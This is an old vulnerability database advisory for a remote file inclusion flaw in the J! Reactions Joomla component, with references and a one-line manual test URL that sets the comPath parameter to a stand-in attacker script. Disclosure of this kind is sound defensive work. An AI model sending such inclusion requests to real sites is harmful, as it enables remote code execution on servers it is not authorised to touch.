J! Reactions for Joomla! (com_jreactions) langset.php comPath Variable Remote File Inclusion

2007-08-03T00:00:00
ID OSVDB:39060
Type osvdb
Reporter OSVDB
Modified 2007-08-03T00:00:00

Description

Manual Testing Notes

http://[target]/administrator/components/com_jreactions/langset.php?comPath=Evil?

References:

Vendor URL: http://jreactions.sdecnet.com/ Other Advisory URL: http://securityreason.com/securityalert/2984 Other Advisory URL: http://yollubunlar.org/joomla-j-reactions-component-rfi-75.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-08/0346.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-08/0054.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-08/0315.html ISS X-Force ID: 35808 CVE-2007-4244 Bugtraq ID: 25198